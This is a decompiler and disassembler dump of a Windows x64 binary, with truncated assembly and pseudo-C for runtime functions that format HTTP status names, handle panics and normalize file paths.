uVar16 = *(&uStack_48 + iVar14);
*(&uStack_48 + iVar14) = 0x14000e984;
iVar10 = sub_140017f82(&stack0x00017ff0 + iVar14, 0x14002514a, uVar16);
if (iVar10 == 0) {
*(&uStack_48 + iVar14) = 0x14000e992;
sub_14001c54d(&stack0xfffffffffffffff0 + iVar14);
}
}
}
}
}
*(&uStack_48 + iVar14) = 0x14000e997;
sub_140015751();
uVar17 = CONCAT62(iVar15 >> 0x10, 0x10);
uVar16 = *(&stack0x00031600 + iVar14);
goto code_r0x00014000edb1;
}
*(&uStack_48 + iVar14) = 0x14000e737;
jmp_kernel32.Sleep(1000);
cVar24 = cVar24 + '\x01';
}
*(&stack0x000314d8 + iVar14) = *(*(*(*(unaff_GS_OFFSET + 0x30) + 0x60) + 0x20) + 0x48);
*(&uStack_48 + iVar14) = 0x14000e76e;
iVar10 = sub_14000f912(&stack0x000314d8 + iVar14, *(&stack0x000315f0 + iVar14), *(&stack0x00031670 + iVar14)
);
if (iVar10 == 0) {
*(&stack0x000315f8 + iVar14) = iVar19;
*(&uStack_48 + iVar14) = 0x14000e9be;
uVar13 = sub_14000c962(&stack0x00031460 + iVar14);
uVar17 = uVar13;
uVar25 = 0;
*(&stack0x00031590 + iVar14) = uVar17;
while( true ) {
if (uVar25 == uVar17) break;
*(&uStack_48 + iVar14) = 0x14000e9f9;
iVar11 = sub_140007046(&stack0x00031460 + iVar14, uVar25 & 0xffffffff, &stack0x0002fff8 + iVar14);
if ((iVar11 != 0) && (*(&stack0x0003003c + iVar14) == 0)) {
*(&uStack_48 + iVar14) = 0x14000ea26;
uVar13 = sub_14000c9ef(&stack0x00031460 + iVar14, uVar25 & 0xffffffff, &stack0x00017ff0 + iVar14
, 0x17ffe);
if (uVar13 != 0) {
uVar22 = uVar13;
for (uVar17 = 0; uVar18 = uVar22, uVar22 != uVar17; uVar17 = uVar17 + 1) {
if (uVar17 == 0x17ffe) {
uVar18 = 0x17ffe;
break;
}
uVar3 = (&stack0x00017ff0)[uVar17 + iVar14];
uVar20 = 0x5f;
if (((0x3f < uVar3) || ((0xd400040400000000U >> (uVar3 & 0x3f) & 1) == 0)) &&
(uVar3 != 0x7c)) {
uVar20 = uVar3;
}
(&stack0xfffffffffffffff0)[uVar17 + iVar14] = uVar20;
}
*(&stack0x00031528 + iVar14) = *(&stack0x000315f0 + iVar14);
*(&stack0x00031530 + iVar14) = *(&stack0x00031670 + iVar14);
*(&stack0x00031538 + iVar14) = &stack0xfffffffffffffff0 + iVar14;
*(&stack0x00031540 + iVar14) = uVar18;
*(&uStack_48 + iVar14) = 0x14000eac0;
sub_14000e390(&stack0x00031548 + iVar14, *(&stack0x000315d0 + iVar14),
&stack0x00031528 + iVar14);
uVar4 = *(&stack0x00031558 + iVar14);
if (uVar4 == 0) {
uVar16 = *(&stack0x00031548 + iVar14);
uVar23 = *(&stack0x00031550 + iVar14);
*(&uStack_48 + iVar14) = 0x14000eaeb;
uVar21 = uVar23;
iVar19 = sub_14000f786(uVar16, uVar23);
if (iVar19 != 0) {
*(&stack0x00031588 + iVar14) =
*(*(*(*(unaff_GS_OFFSET + 0x30) + 0x60) + 0x20) + 0x48);
*(&uStack_48 + iVar14) = 0x14000eb1e;
sub_14000f912(&stack0x00031588 + iVar14, iVar19, uVar21);
}
*(&stack0x000315e0 + iVar14) = uVar16;
*(&stack0x00031560 + iVar14) = uVar16;
*(&stack0x000315d8 + iVar14) = uVar23;
*(&stack0x00031568 + iVar14) = uVar23;
puVar5 = *(&stack0x000315d0 + iVar14);
uVar12 = *puVar5;
uVar6 = puVar5[1];
uVar7 = puVar5[2];
uVar8 = puVar5[3];
*(&stack0x000315e8 + iVar14) = 0;
*(&stack0x00031510 + iVar14) = uVar12;
*(&stack0x00031514 + iVar14) = uVar6;
*(&stack0x00031518 + iVar14) = uVar7;
*(&stack0x0003151c + iVar14) = uVar8;
*(&stack0x000315b0 + iVar14) = &stack0x000315e8 + iVar14;
puVar2 = &stack0x000315b0 + iVar14;
*(&stack0x00030450 + iVar14) = puVar2;
*(&stack0x00030458 + iVar14) = sub_140017fde;
*(&uStack_48 + iVar14) = 0x14000eb8f;
sub_14001c0d8(&stack0x00030450 + iVar14, &stack0x00031560 + iVar14);
*(&uStack_48 + iVar14) = 0x14000eba9;
sub_140015d45(&stack0x00031570 + iVar14, &stack0x00031510 + iVar14,
*(&stack0x000315e8 + iVar14));
uVar4 = *(&stack0x00031580 + iVar14);
if (uVar4 == 0) {
*(&stack0x00030450 + iVar14) = *(&stack0x00031570 + iVar14);
*(&stack0x00030454 + iVar14) = *(&stack0x00031574 + iVar14);
*(&stack0x00030458 + iVar14) = *(&stack0x00031578 + iVar14);
*(&stack0x0003045c + iVar14) = *(&stack0x0003157c + iVar14);
*(&stack0x00030460 + iVar14) = 0;
*(&stack0x000315e8 + iVar14) = &stack0x00030450 + iVar14;
*(&stack0x000315b0 + iVar14) = &stack0x000315e8 + iVar14;
/* listing truncated */0x14001F029 sub_14001f029 str 7 api 0 imm 20 Unknown
sub_14001f029() {
push rbp
push rsi
push rdi
push rbx
sub rsp, 0x58
lea rbp, [rsp+0x50]
mov rdi, rdx
mov rsi, rcx
movups xmm0, [rcx]
lea rcx, [rbp-0x30]
movaps [rcx], xmm0
lea rdx, [0x14005594C]
push 0x0E
pop r8
call sub_140017f82()
test ax, ax
jnz .18
movzx ebx, word ptr [rdi]
movups xmm0, [rsi]
lea rcx, [rbp-0x10]
movaps [rcx], xmm0
lea rdx, ["http.Status"]
push 0x0B
pop rdi
mov r8, rdi
call sub_140017f82()
test ax, ax
jnz .18
mov eax, ebx
and eax, 0x3FF
lea ecx, [rax-0x190]
cmp ecx, 0x33
jbe .1
lea ecx, [rax-0x1F4]
cmp ecx, 0x0B
jbe .2
lea ecx, [rax-0xC8]
cmp ecx, 0x08
jbe .3
lea ecx, [rax-0x12C]
cmp ecx, 0x08
jnbe .4
lea rax, [0x140024994]
movsxd rcx, dword ptr [rax+rcx*4]
add rcx, rax
jmp rcx
lea rdx, [0x140055A3E]
lea rcx, [rbp-0x10]
push 0x01
pop r8
call sub_140017f82()
test ax, ax
jnz .18
lea rdx, ["multiple_choice"]
jmp .13
.1:
lea rax, [0x1400249B8]
movsxd rcx, dword ptr [rax+rcx*4]
add rcx, rax
jmp rcx
lea rdx, [0x140055A3E]
lea rcx, [rbp-0x10]
push 0x01
pop r8
call sub_140017f82()
test ax, ax
jnz .18
lea rdx, ["bad_request"]
jmp .14
.2:
lea rax, [0x140024A88]
movsxd rcx, dword ptr [rax+rcx*4]
add rcx, rax
jmp rcx
lea rdx, [0x140055A3E]
lea rcx, [rbp-0x10]
push 0x01
pop r8
call sub_140017f82()
test ax, ax
jnz .18
lea rdx, ["internal_server_error"]
jmp .9
.3:
lea rax, [0x140024970]
movsxd rcx, dword ptr [rax+rcx*4]
add rcx, rax
jmp rcx
.4:
lea ecx, [rax-0x64]
cmp ecx, 0x03
jnbe .5
lea rax, [0x140024960]
movsxd rcx, dword ptr [rax+rcx*4]
add rcx, rax
jmp rcx
lea rdx, [0x140055A3E]
lea rcx, [rbp-0x10]
push 0x01
pop r8
call sub_140017f82()
test ax, ax
jnz .18
lea rdx, ["continue"]
jmp .10
.5:
cmp eax, 0xE2
jnz .6
lea rdx, [0x140055A3E]
lea rcx, [rbp-0x10]
push 0x01
pop r8
call sub_140017f82()
test ax, ax
jnz .18
lea rdx, ["im_used"]
jmp .11
.6:
lea rdx, [0x140055E15]
lea rcx, [rbp-0x10]
push 0x01
pop r8
call sub_140017f82()
test ax, ax
jnz .18
push 0x0A
pop r8
mov r9w, 0x64
mov r10b, 0x0A
.7:
and ebx, 0x3FF
mov [rbp-0x12], bx
cmp bx, 0x64
jb .8
mov eax, ebx
and eax, 0x3FF
xor edx, edx
div r9w
mov ecx, eax
imul eax, ecx, 0x64
sub ebx, eax
movzx eax, bl
div r10b
movzx edx, ah
or dl, 0x30
movzx edx, dl
shl edx, 0x08
movzx eax, al
add eax, edx
add eax, 0x30
mov [rbp+r8*1-0x1E], ax
add r8, 0xFFFFFFFFFFFFFFFE
mov ebx, ecx
jmp .7
.8:
cmp bx, 0x09
jnbe .15
or bl, 0x30
mov [rbp+r8*1-0x1D], bl
jmp .16
lea rdx, [0x140055A3E]
lea rcx, [rbp-0x10]
push 0x01
pop r8
call sub_140017f82()
test ax, ax
jnz .18
lea rdx, ["loop_detected"]
jmp .12
.9:
lea rcx, [rbp-0x10]
push 0x15
jmp .17
.10:
lea rcx, [rbp-0x10]
push 0x08
jmp .17
.11:
lea rcx, [rbp-0x10]
push 0x07
jmp .17
.12:
lea rcx, [rbp-0x10]
push 0x0D
jmp .17
.13:
lea rcx, [rbp-0x10]
push 0x0F
jmp .17
.14:
lea rcx, [rbp-0x10]
push 0x0B
jmp .17
.15:
movzx eax, bl
mov cl, 0x0A
div cl
movzx ecx, ah
or cl, 0x30
movzx ecx, cl
shl ecx, 0x08
movzx eax, al
add eax, ecx
add eax, 0x30
mov [rbp+r8*1-0x1E], ax
dec r8
.16:
lea rcx, [r8+rbp*1]
add rcx, 0xFFFFFFFFFFFFFFE3
sub rdi, r8
lea r8, [0x140055960]
mov rdx, rdi
mov r9, rsi
call sub_14001c11f()
test ax, ax
jnz .18
lea rdx, [0x140055E17]
lea rcx, [rbp-0x10]
push 0x01
; listing truncated
/* DISPLAY WARNING: Type casts are NOT being printed */
void sub_14001f029(undefined4 *param_1,uint16_t *param_2)
{
int16_t iVar1;
uint16_t uVar2;
uint32_t uVar3;
undefined8 uVar4;
uint32_t uVar5;
int64_t iVar6;
undefined8 uStack_80;
undefined4 uStack_58;
undefined4 uStack_54;
undefined4 uStack_50;
undefined4 uStack_4c;
undefined2 uStack_46;
uint16_t uStack_3a;
undefined4 uStack_38;
undefined4 uStack_34;
undefined4 uStack_30;
undefined4 uStack_2c;
uStack_58 = *param_1;
uStack_54 = param_1[1];
uStack_50 = param_1[2];
uStack_4c = param_1[3];
iVar1 = sub_140017f82(&uStack_58, 0x14005594c, 0xe);
if (iVar1 != 0) {
return;
}
uVar5 = *param_2;
uStack_38 = *param_1;
uStack_34 = param_1[1];
uStack_30 = param_1[2];
uStack_2c = param_1[3];
iVar1 = sub_140017f82(&uStack_38, "http.Status", 0xb);
if (iVar1 != 0) {
return;
}
uVar3 = uVar5 & 0x3ff;
switch(uVar3) {
case :
iVar1 = sub_140017f82(&uStack_38, 0x140055a3e, 1);
if (iVar1 != 0) {
return;
}
uVar4 = "bad_request";
code_r0x00014001fbef:
uStack_80 = 0xb;
break;
case :
iVar1 = sub_140017f82(&uStack_38, 0x140055a3e, 1);
if (iVar1 != 0) {
return;
}
uVar4 = "unauthorized";
goto code_r0x00014001fad5;
case :
iVar1 = sub_140017f82(&uStack_38, 0x140055a3e, 1);
if (iVar1 != 0) {
return;
}
uVar4 = "payment_required";
goto code_r0x00014001fb91;
case :
iVar1 = sub_140017f82(&uStack_38, 0x140055a3e, 1);
if (iVar1 != 0) {
return;
}
uVar4 = "forbidden";
goto code_r0x00014001f870;
case :
iVar1 = sub_140017f82(&uStack_38, 0x140055a3e, 1);
if (iVar1 != 0) {
return;
}
uVar4 = "not_found";
goto code_r0x00014001f870;
case :
iVar1 = sub_140017f82(&uStack_38, 0x140055a3e, 1);
if (iVar1 != 0) {
return;
}
uVar4 = "method_not_allowed";
goto code_r0x00014001f91a;
case :
iVar1 = sub_140017f82(&uStack_38, 0x140055a3e, 1);
if (iVar1 != 0) {
return;
}
uVar4 = "not_acceptable";
uStack_80 = 0xe;
break;
case :
iVar1 = sub_140017f82(&uStack_38, 0x140055a3e, 1);
if (iVar1 != 0) {
return;
}
uVar4 = "proxy_auth_required";
goto code_r0x00014001fc17;
case :
iVar1 = sub_140017f82(&uStack_38, 0x140055a3e, 1);
if (iVar1 != 0) {
return;
}
uVar4 = "request_timeout";
goto code_r0x00014001fb62;
case :
iVar1 = sub_140017f82(&uStack_38, 0x140055a3e, 1);
if (iVar1 != 0) {
return;
}
uVar4 = "conflict";
code_r0x00014001fa77:
uStack_80 = 8;
break;
case :
iVar1 = sub_140017f82(&uStack_38, 0x140055a3e, 1);
if (iVar1 != 0) {
return;
}
uVar4 = "gone";
uStack_80 = 4;
break;
case :
iVar1 = sub_140017f82(&uStack_38, 0x140055a3e, 1);
if (iVar1 != 0) {
return;
}
uVar4 = "length_required";
code_r0x00014001fb62:
uStack_80 = 0xf;
break;
case :
iVar1 = sub_140017f82(&uStack_38, 0x140055a3e, 1);
if (iVar1 != 0) {
return;
}
uVar4 = "precondition_failed";
goto code_r0x00014001fc17;
case :
iVar1 = sub_140017f82(&uStack_38, 0x140055a3e, 1);
if (iVar1 != 0) {
return;
}
uVar4 = "payload_too_large";
goto code_r0x00014001f998;
case :
iVar1 = sub_140017f82(&uStack_38, 0x140055a3e, 1);
if (iVar1 != 0) {
return;
}
uVar4 = "uri_too_long";
code_r0x00014001fad5:
uStack_80 = 0xc;
break;
case :
iVar1 = sub_140017f82(&uStack_38, 0x140055a3e, 1);
if (iVar1 != 0) {
return;
}
uVar4 = "unsupported_media_type";
code_r0x00014001faa6:
uStack_80 = 0x16;
break;
case :
iVar1 = sub_140017f82(&uStack_38, 0x140055a3e, 1);
if (iVar1 != 0) {
return;
}
uVar4 = "range_not_satisfiable";
goto code_r0x00014001fa1f;
case :
iVar1 = sub_140017f82(&uStack_38, 0x140055a3e, 1);
if (iVar1 != 0) {
return;
}
uVar4 = "expectation_failed";
code_r0x00014001f91a:
uStack_80 = 0x12;
break;
case :
iVar1 = sub_140017f82(&uStack_38, 0x140055a3e, 1);
if (iVar1 != 0) {
return;
}
uVar4 = "teapot";
goto code_r0x00014001f9c7;
case :
case :
case :
case :
case :
case :
case :
case :
case :
case :
case :
case :
case :
case :
case :
case :
case :
case :
case :
case :
case :
case :
case :
goto code_r0x00014001f221;
case :
iVar1 = sub_140017f82(&uStack_38, 0x140055a3e, 1);
if (iVar1 != 0) {
return;
}
uVar4 = "misdirected_request";
/* listing truncated */0x14001B8EC sub_14001b8ec str 5 api 0 imm 9 Unknown
sub_14001b8ec() {
push rbp
push r15
push r14
push rsi
push rdi
push rbx
sub rsp, 0x78
lea rbp, [rsp+0x70]
mov rdi, rcx
mov eax, [0x14005D1F8]
mov rcx, gs:[0x58]
mov rax, [rcx+rax*8]
mov rax, [rax+0x2210]
test rax, rax
jnz .2
mov rsi, rdx
mov eax, [0x14005D1F8]
mov rcx, gs:[0x58]
mov rax, [rcx+rax*8]
mov qword ptr [rax+0x2210], 0x01
lock inc byte ptr [0x14005C184]
call sub_1400156a9()
mov rax, gs:[0x30]
mov rax, [rax+0x60]
mov rax, [rax+0x20]
mov r15, [rax+0x30]
mov rax, gs:[0x30]
mov rbx, [rax+0x48]
lea rax, [rbp-0x28]
mov [rax], r15
lea rcx, [rbp-0x10]
mov [rcx], rax
lea r14, [sub_140015725()]
mov [rcx+0x08], r14
lea rdx, [0x140055859]
push 0x07
pop r8
call sub_140017f82()
test ax, ax
jnz .3
lea rdx, [0x140055960]
lea r8, [rbp-0x10]
mov ecx, ebx
call sub_140020a3c()
test ax, ax
jnz .3
lea rdx, [0x140055860]
lea rcx, [rbp-0x10]
push 0x08
pop r8
call sub_140017f82()
test ax, ax
jnz .3
lea rax, [rbp-0x30]
mov [rax], r15
lea r9, [rbp-0x40]
mov [r9], rax
mov [r9+0x08], r14
lea r8, [0x140055960]
mov rcx, rdi
mov rdx, rsi
call sub_14001c11f()
test ax, ax
jnz .3
lea rdx, [0x14002514A]
lea rcx, [rbp-0x40]
push 0x01
pop r8
call sub_140017f82()
test ax, ax
jnz .3
mov rax, gs:[0x30]
mov rax, [rax+0x60]
mov rax, [rax+0x20]
mov rax, [rax+0x30]
mov rdx, rbp
mov [rdx], rax
lea rcx, [rbp-0x20]
mov [rcx], rdx
mov [rcx+0x08], r14
lea rdx, [0x1400559F1]
push 0x30
pop r8
call sub_140017f82()
call sub_140015751()
lock dec byte ptr [0x14005C184]
jz .3
mov rsi, rbp
and dword ptr [rsi], 0x00
lea rdi, [rbp-0x20]
push 0x04
pop rbx
.1:
and dword ptr [rbp-0x20], 0x00
mov rcx, rsi
mov rdx, rdi
mov r8, rbx
xor r9d, r9d
call jmp_ntdll.RtlWaitOnAddress()
jmp .1
.2:
cmp rax, 0x01
jnz .3
mov eax, [0x14005D1F8]
mov rcx, gs:[0x58]
mov rax, [rcx+rax*8]
mov qword ptr [rax+0x2210], 0x02
mov rax, gs:[0x30]
mov rax, [rax+0x60]
mov rax, [rax+0x20]
mov rax, [rax+0x30]
lea rcx, [rbp-0x48]
mov [rcx], rax
lea rdx, ["aborting due to recursive panic\n"]
push 0x20
pop r8
call sub_14000fe88()
.3:
call sub_14001e76a()
}
/* DISPLAY WARNING: Type casts are NOT being printed */
void sub_14001b8ec(undefined8 param_1,undefined8 param_2)
{
int64_t iVar1;
undefined8 uVar2;
uint64_t uVar3;
code *pcVar4;
int16_t iVar5;
int64_t unaff_GS_OFFSET;
undefined8 uStack_80;
undefined8 *puStack_78;
code *pcStack_70;
undefined8 uStack_68;
undefined8 uStack_60;
uint64_t *puStack_58;
code *pcStack_50;
undefined8 *puStack_48;
code *pcStack_40;
uint64_t uStack_38;
iVar1 = *(*(*(unaff_GS_OFFSET + 0x58) + [0x0x14005d1f8] * 8) + 0x2210);
if (iVar1 == 0) {
*(*(*(unaff_GS_OFFSET + 0x58) + [0x0x14005d1f8] * 8) + 0x2210) = 1;
LOCK();
[0x0x14005c184] = [0x0x14005c184] + '\x01';
UNLOCK();
sub_1400156a9();
uVar2 = *(*(*(*(unaff_GS_OFFSET + 0x30) + 0x60) + 0x20) + 0x30);
uVar3 = *(*(unaff_GS_OFFSET + 0x30) + 0x48);
puStack_48 = &uStack_60;
pcStack_40 = sub_140015725;
uStack_60 = uVar2;
iVar5 = sub_140017f82(&puStack_48, 0x140055859, 7);
if (iVar5 == 0) {
iVar5 = sub_140020a3c(uVar3 & 0xffffffff, 0x140055960, &puStack_48);
if (iVar5 == 0) {
iVar5 = sub_140017f82(&puStack_48, 0x140055860, 8);
if (iVar5 == 0) {
puStack_78 = &uStack_68;
pcStack_70 = sub_140015725;
uStack_68 = uVar2;
iVar5 = sub_14001c11f(param_1, param_2, 0x140055960);
if (iVar5 == 0) {
iVar5 = sub_140017f82(&puStack_78, 0x14002514a, 1);
if (iVar5 == 0) {
uStack_38 = *(*(*(*(unaff_GS_OFFSET + 0x30) + 0x60) + 0x20) + 0x30);
pcStack_50 = sub_140015725;
puStack_58 = &uStack_38;
sub_140017f82(&puStack_58, 0x1400559f1, 0x30);
sub_140015751();
LOCK();
[0x0x14005c184] = [0x0x14005c184] + -1;
UNLOCK();
if ([0x0x14005c184] != '\0') {
uStack_38 = uStack_38 & 0xffffffff00000000;
do {
puStack_58 = puStack_58 & 0xffffffff00000000;
jmp_ntdll.RtlWaitOnAddress(&uStack_38, &puStack_58, 4, 0);
} while( true );
}
}
}
}
}
}
}
else if (iVar1 == 1) {
*(*(*(unaff_GS_OFFSET + 0x58) + [0x0x14005d1f8] * 8) + 0x2210) = 2;
uStack_80 = *(*(*(*(unaff_GS_OFFSET + 0x30) + 0x60) + 0x20) + 0x30);
sub_14000fe88(&uStack_80, "aborting due to recursive panic\u25d9", 0x20);
}
sub_14001e76a();
pcVar4 = swi(3);
(*pcVar4)();
return;
}
0x140017512 sub_140017512 str 4 api 0 imm 49 Unknown
sub_140017512() {
push rbp
push r15
push r14
push r13
push r12
push rsi
push rdi
push rbx
mov eax, 0x506F8
call sub_140021d41()
sub rsp, rax
lea rbp, [rsp+0x80]
mov rbx, r9
mov rdi, r8
mov r14, rdx
mov rsi, rcx
mov r13, 0x5C003F003F005C
push 0x04
pop r12
cmp r9, 0x04
jnb .1
test rbx, rbx
jz .14
movzx eax, word ptr [rdi]
jmp .8
.1:
movzx eax, word ptr [rdi]
cmp eax, 0x2F
jz .2
cmp eax, 0x5C
jnz .8
movzx edx, word ptr [rdi+0x06]
cmp edx, 0x2F
jz .2
mov cl, 0x01
cmp edx, 0x5C
jz .3
jmp .10
.2:
xor ecx, ecx
.3:
movzx edx, word ptr [rdi+0x02]
cmp edx, 0x2F
jz .5
cmp edx, 0x3F
jz .4
cmp edx, 0x5C
jz .6
jmp .8
.4:
cmp word ptr [rdi+0x04], 0x3F
setz dl
test cl, dl
jnz .7
jmp .8
.5:
xor ecx, ecx
.6:
movzx edx, word ptr [rdi+0x04]
cmp edx, 0x2E
jz .20
cmp edx, 0x3F
jnz .8
test cl, cl
jz .20
.7:
lea r14, [rbp+0xFFD0]
mov [r14-0x08], r13
add rdi, 0x08
lea r8, [rbx*2-0x08]
mov rcx, r14
mov rdx, rdi
call sub_140021d71()
mov [r14-0x10], rbx
and word ptr [rbp+rbx*2+0xFFC8], 0x00
and word ptr [rsi+0x10008], 0x00
lea rdx, [rbp+0xFFC0]
jmp .55
.8:
cmp ax, 0x5C
jz .9
movzx eax, ax
cmp eax, 0x2F
jnz .13
.9:
mov r15b, 0x03
cmp rbx, 0x01
jz .17
.10:
movzx eax, word ptr [rdi+0x02]
cmp eax, 0x5C
jz .11
mov r15b, 0x03
cmp eax, 0x2F
jnz .17
.11:
cmp rbx, 0x03
jnz .16
movzx eax, word ptr [rdi+0x04]
cmp eax, 0x2E
jz .12
cmp eax, 0x3F
jnz .16
.12:
lea rdx, [rbp+0x2FFD0]
mov [rdx+0x08], r13
mov qword ptr [rdx], 0x04
and word ptr [rdx+0x10], 0x00
jmp .15
.13:
cmp rbx, 0x01
jz .14
cmp word ptr [rdi+0x02], 0x3A
jnz .14
mov r15b, 0x02
cmp rbx, 0x03
jb .17
movzx eax, word ptr [rdi+0x04]
cmp ax, 0x5C
setz cl
cmp ax, 0x2F
setz al
or al, cl
mov r15b, 0x02
sub r15b, al
jmp .17
.14:
lea r15, [rbp+0x2FFD8]
lea r8, [rbx+rbx*1]
mov rcx, r15
mov rdx, rdi
call sub_140021d71()
mov r13, r12
lea r12, [rbp+0x50620]
mov rcx, r12
mov rdx, r15
mov r8, rbx
call sub_14001bf4d()
mov r15b, 0x04
cmp word ptr [r12+0x08], 0x00
mov r12, r13
mov r13, 0x5C003F003F005C
jnz .17
mov rax, [rbp+0x50620]
lea rdx, [rbp+0x2FFD0]
mov [rdx], rax
and word ptr [rbp+rax*2+0x2FFD8], 0x00
.15:
and word ptr [rsi+0x10008], 0x00
jmp .55
.16:
push 0x06
pop r12
xor r15d, r15d
.17:
mov [rbp+0x2FFD8], r13
cmp r15b, 0x04
setnz al
test r14, r14
setz cl
or cl, al
cmp cl, 0x01
jz .49
mov rax, gs:[0x30]
mov rax, [rax+0x60]
mov rax, [rax+0x20]
cmp [rax+0x48], r14
jz .49
mov [rbp+0x50638], r12
lea rdx, [rbp+0x4FFDA]
lea rcx, [rbp+0x3FFE3]
and rcx, 0xFFFFFFFFFFFFFFF8
xor r12d, r12d
mov eax, 0x00
sub rdx, rcx
jb .18
mov rax, rdx
shr rax, 0x01
test rdx, rdx
cmovz rax, rdx
mov rdx, 0xAAAAAAAAAAAAAAAA
cmovz rcx, rdx
mov r12, rcx
.18:
test r12, r12
jz .19
lea ecx, [rax+rax*1]
cmp rax, 0x7FFFFFFF
push 0xFFFFFFFFFFFFFFFF
pop r9
cmovbe r9d, ecx
and qword ptr [rsp+0x20], 0x00
push 0x01
pop rdx
mov rcx, r14
mov r8, r12
call jmp_ntdll.NtQueryObject()
mov r14w, 0x0F
cmp eax, 0x80000005
jz .21
cmp eax, 0xC0000004
jz .21
cmp eax, 0xC0000008
jz .22
cmp eax, 0xC0000022
jz .23
cmp eax, 0xC0000023
jz .21
test eax, eax
jnz .30
cmp word ptr [r12+0x02], 0x00
jz .24
movzx eax, word ptr [r12]
shr eax, 0x01
mov [rbp+0x50658], rax
add r12, 0x08
jmp .26
.19:
mov r14w, 0x06
; listing truncated
/* DISPLAY WARNING: Type casts are NOT being printed */
int64_t sub_140017512(int64_t param_1,undefined *param_2,int16_t *param_3,uint64_t param_4)
{
char cVar1;
int16_t iVar2;
int64_t iVar3;
bool bVar4;
int16_t iVar5;
uint16_t uVar6;
int32_t iVar7;
uint32_t uVar8;
int64_t iVar9;
uint64_t uVar10;
uint16_t *puVar11;
uint16_t *puVar12;
int64_t iVar13;
uint64_t uVar14;
uint64_t *puVar15;
uint32_t uVar16;
undefined8 uVar17;
int64_t iVar18;
int64_t *piVar19;
int64_t iVar20;
uint16_t uVar21;
int16_t *piVar22;
char cVar23;
int64_t unaff_GS_OFFSET;
uint64_t uStack_48;
uStack_48 = 0x140017528;
iVar9 = sub_140021d41();
iVar9 = -iVar9;
*(&uStack_48 + iVar9) = 4;
iVar18 = *(&uStack_48 + iVar9);
if (param_4 < 4) {
if (param_4 != 0) {
iVar5 = *param_3;
goto code_r0x00014001760e;
}
code_r0x0001400176ac:
*(&uStack_48 + iVar9) = 0x1400176c2;
sub_140021d71(&stack0x00030018 + iVar9, param_3, param_4 * 2);
*(&uStack_48 + iVar9) = 0x1400176da;
sub_14001bf4d(&stack0x00050660 + iVar9, &stack0x00030018 + iVar9, param_4);
cVar23 = '\x04';
if (*(&stack0x00050668 + iVar9) != 0) goto code_r0x000140017721;
puVar15 = &stack0x00030010 + iVar9;
*puVar15 = *(&stack0x00050660 + iVar9);
*(&stack0x00030018 + *(&stack0x00050660 + iVar9) * 2 + iVar9) = 0;
code_r0x00014001770d:
*(param_1 + 0x10008) = 0;
code_r0x000140017dbe:
uVar17 = 0x10008;
}
else {
iVar5 = *param_3;
if (iVar5 == 0x2f) {
code_r0x00014001758a:
bVar4 = false;
code_r0x00014001758c:
iVar2 = param_3[1];
if (iVar2 != 0x2f) {
if (iVar2 != 0x3f) {
if (iVar2 == 0x5c) goto code_r0x0001400175b1;
code_r0x00014001760e:
if ((iVar5 == 0x5c) || (iVar5 == 0x2f)) {
cVar23 = '\x03';
if (param_4 != 1) goto code_r0x000140017629;
}
else {
if ((param_4 == 1) || (param_3[1] != 0x3a)) goto code_r0x0001400176ac;
cVar23 = '\x02';
if (2 < param_4) {
cVar23 = '\x02' - (param_3[2] == 0x2f || param_3[2] == 0x5c);
}
}
goto code_r0x000140017721;
}
if (!(bVar4 & param_3[2] == 0x3f)) goto code_r0x00014001760e;
code_r0x0001400175cb:
*(&stack0x00010008 + iVar9) = 0x5c003f003f005c;
*(&uStack_48 + iVar9) = 0x1400175ed;
sub_140021d71(&stack0x00010010 + iVar9, param_3 + 4, param_4 * 2 + -8);
*(&stack0x00010000 + iVar9) = param_4;
*(&stack0x00010008 + param_4 * 2 + iVar9) = 0;
*(param_1 + 0x10008) = 0;
puVar15 = &stack0x00010000 + iVar9;
goto code_r0x000140017dbe;
}
bVar4 = false;
code_r0x0001400175b1:
if (param_3[2] != 0x2e) {
if (param_3[2] != 0x3f) goto code_r0x00014001760e;
if (bVar4) goto code_r0x0001400175cb;
}
*(&uStack_48 + iVar9) = 0x14001784b;
uVar8 = jmp_ntdll.RtlGetFullPathName_U(param_3, 0xfffe, &stack0x00000000 + iVar9, 0);
if (uVar8 == 0) goto code_r0x000140017d7c;
if (uVar8 < 0x10000) {
puVar15 = &stack0xfffffffffffffff8 + iVar9;
*puVar15 = uVar8 >> 1;
*(&stack0x00000000 + iVar9) = 0x5c003f003f005c;
goto code_r0x00014001770d;
}
code_r0x000140017d73:
puVar15 = 0x140035160;
}
else {
if (iVar5 != 0x5c) goto code_r0x00014001760e;
if (param_3[3] == 0x2f) goto code_r0x00014001758a;
bVar4 = true;
if (param_3[3] == 0x5c) goto code_r0x00014001758c;
code_r0x000140017629:
if ((param_3[1] == 0x5c) || (cVar23 = '\x03', param_3[1] == 0x2f)) {
if ((param_4 == 3) && ((param_3[2] == 0x2e || (param_3[2] == 0x3f)))) {
puVar15 = &stack0x00030010 + iVar9;
*(&stack0x00030018 + iVar9) = 0x5c003f003f005c;
*puVar15 = 4;
*(&stack0x00030020 + iVar9) = 0;
goto code_r0x00014001770d;
}
*(&uStack_48 + iVar9) = 6;
iVar18 = *(&uStack_48 + iVar9);
cVar23 = '\0';
}
code_r0x000140017721:
*(&stack0x00030018 + iVar9) = 0x5c003f003f005c;
if ((param_2 == 0x0 || cVar23 != '\x04') ||
(*(*(*(*(unaff_GS_OFFSET + 0x30) + 0x60) + 0x20) + 0x48) == param_2)) {
code_r0x000140017d47:
uVar16 = iVar18 ^ 0x7fff;
*(&uStack_48 + iVar9) = 0x140017d69;
uVar8 = jmp_ntdll.RtlGetFullPathName_U(param_3, uVar16 * 2, &stack0x00030018 + iVar18 * 2 + iVar9, 0);
if (uVar8 != 0) {
if (uVar16 < uVar8 >> 1) goto code_r0x000140017d73;
*(&stack0x00030010 + iVar9) = iVar18 + (uVar8 >> 1);
if (cVar23 == '\0') {
*(&stack0x00030024 + iVar9) = 0x43;
*(&stack0x00030020 + iVar9) = 0x4e0055;
}
*(param_1 + 0x10008) = 0;
puVar15 = &stack0x00030010 + iVar9;
goto code_r0x000140017dbe;
}
code_r0x000140017d7c:
puVar15 = 0x140045170;
}
else {
*(&stack0x00050678 + iVar9) = iVar18;
puVar11 = &stack0x00040023 + iVar9 & 0xfffffffffffffff8;
uVar10 = 0;
uVar14 = (&stack0x0005001a + iVar9) - puVar11;
puVar12 = 0x0;
if ((puVar11 <= &stack0x0005001a + iVar9) && (uVar10 = uVar14 >> 1, puVar12 = puVar11, uVar14 == 0)) {
puVar12 = 0xaaaaaaaaaaaaaaaa;
uVar10 = 0;
}
if (puVar12 == 0x0) {
uVar21 = 6;
goto code_r0x0001400179d7;
}
*(&uStack_48 + iVar9) = 0xffffffffffffffff;
uVar14 = *(&uStack_48 + iVar9) & 0xffffffff;
